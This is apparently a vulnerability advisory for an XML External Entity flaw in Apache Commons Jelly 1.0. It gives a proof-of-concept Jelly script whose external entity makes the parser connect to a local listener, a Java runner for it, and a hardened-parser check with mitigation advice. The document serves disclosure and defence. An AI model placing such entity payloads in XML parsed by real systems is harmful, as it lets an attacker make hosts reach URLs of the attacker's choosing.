**Severity**: Medium
**Vendor**: The Apache Software Foundation
**Versions Affected**: commons-jelly-1.0 (core), namely commons-jelly-1.0.jar
**Description**: When a Jelly script (an XML file) is parsed with Xerces, a DOCTYPE that declares an external entity with a `SYSTEM` URL (`<!ENTITY sp SYSTEM "http://...">`) and references that entity in the body causes the parser to open a connection to the URL while the script is being parsed, before any Jelly tag runs. This is an XML External Entity (XXE) issue, not cross site scripting: whoever controls a script that gets parsed can make the host contact a URL of their choosing. The fix recommended by the Open Web Application Security Project is to configure the XMLReader as described at https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#XMLReader
**Mitigation**: 1.0 users should migrate to 1.0.1.
**Credit**: This was discovered by Luca Carettoni of Doyensec.
**Example**:
example.jelly
	<?xml version="1.0"?>
	<!-- External general entity: when &sp; is expanded the parser opens this URL,
	     before any Jelly tag executes. Port 4444 stands for a listener under the
	     tester's control (for example a netcat listener). -->
	<!DOCTYPE r [
	    <!ELEMENT r ANY >
	    <!ENTITY sp SYSTEM "http://127.0.0.1:4444/">
	    ]>
	<j:jelly trim="false" xmlns:j="jelly:core"
	         xmlns:x="jelly:xml"
	         xmlns:html="jelly:html">
	    <!-- The reference sits inside the single root so the document stays well-formed. -->
	    <r>&sp;</r>
	</j:jelly>
ExampleParser.java
	import java.io.IOException;

	import org.apache.commons.jelly.JellyContext;
	import org.apache.commons.jelly.JellyException;

	/**
	 * Loads example.jelly (resolved relative to the working directory) with
	 * Jelly's default, Xerces-backed parser. Parsing alone triggers the entity
	 * fetch; the script does not need to produce any output.
	 */
	public class ExampleParser {
	    public static void main(String[] args) throws JellyException, IOException {
	        JellyContext context = new JellyContext();
	        // No XMLOutput is needed to observe the connection attempt.
	        context.runScript("example.jelly", null);
	    }
	}
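The following check is an added example, not code from this advisory or from Commons Jelly. It applies the cheat sheet's XMLReader guidance to a plain JAXP SAX parser (the same Xerces features Jelly's parser is built on, but this is not Jelly's `XMLParser`) and shows three configurations side by side: the defaults, which resolve the entity; external entities disabled, which keeps the DOCTYPE but never goes to the network; and `disallow-doctype-decl`, which rejects the document outright. An `EntityResolver` that records the requested URL instead of fetching it keeps the run offline; the document is a constructed copy of the PoC above and the SYSTEM URL is a placeholder that is never contacted.

```java
import java.io.IOException;
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;

import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;

import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

public class XxeCheck {

    // Constructed input mirroring the advisory's PoC. The SYSTEM URL is a
    // placeholder; the resolver below intercepts the request, so nothing is contacted.
    static final String POC =
          "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE r [\n"
        + "    <!ELEMENT r ANY >\n"
        + "    <!ENTITY sp SYSTEM \"http://127.0.0.1:4444/\">\n"
        + "]>\n"
        + "<r>&sp;</r>\n";

    /** Records each external entity the parser tries to fetch and serves a canned body instead. */
    static final class RecordingResolver extends DefaultHandler {
        final List<String> requested = new ArrayList<>();
        final StringBuilder content = new StringBuilder();

        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            requested.add(systemId);   // the URL a real parser would have opened here
            return new InputSource(new StringReader("FETCHED"));
        }

        @Override
        public void characters(char[] ch, int start, int length) {
            content.append(ch, start, length);
        }
    }

    /** JAXP defaults: external general entities are resolved (the vulnerable setting). */
    static XMLReader defaultReader() throws ParserConfigurationException, SAXException {
        return SAXParserFactory.newInstance().newSAXParser().getXMLReader();
    }

    /** Strictest option from the cheat sheet: refuse any DOCTYPE, so no entity can be declared at all. */
    static XMLReader doctypeRejectingReader() throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return f.newSAXParser().getXMLReader();
    }

    /** For inputs that legitimately carry a DTD: allow the DOCTYPE but never resolve anything external. */
    static XMLReader entitiesDisabledReader() throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return f.newSAXParser().getXMLReader();
    }

    /** Parses POC with the given reader and returns the system IDs it asked the resolver for. */
    static List<String> externalFetches(XMLReader reader) throws IOException, SAXException {
        RecordingResolver r = new RecordingResolver();
        reader.setContentHandler(r);
        reader.setEntityResolver(r);
        reader.parse(new InputSource(new StringReader(POC)));
        return r.requested;
    }

    public static void main(String[] args) throws Exception {
        // Vulnerable: the resolver is handed the SYSTEM URL and the canned body lands in <r>.
        System.out.println("default parser fetched: " + externalFetches(defaultReader()));

        // Hardened, DTD still allowed: the parse succeeds, &sp; is skipped, the list is empty.
        System.out.println("entities disabled fetched: " + externalFetches(entitiesDisabledReader()));

        // Hardened, DTD forbidden: the parser stops at the DOCTYPE with a SAXParseException.
        try {
            externalFetches(doctypeRejectingReader());
        } catch (SAXException e) {
            System.out.println("doctype rejected: " + e.getMessage());
        }
    }
}
```

The recording resolver doubles as a regression test for any parser configuration you inherit: feed it the PoC and, if `requested` is non-empty, the configuration still reaches out for external entities. Prefer `disallow-doctype-decl` wherever the scripts being parsed have no business carrying a DTD; fall back to the three entity features only for inputs that need one.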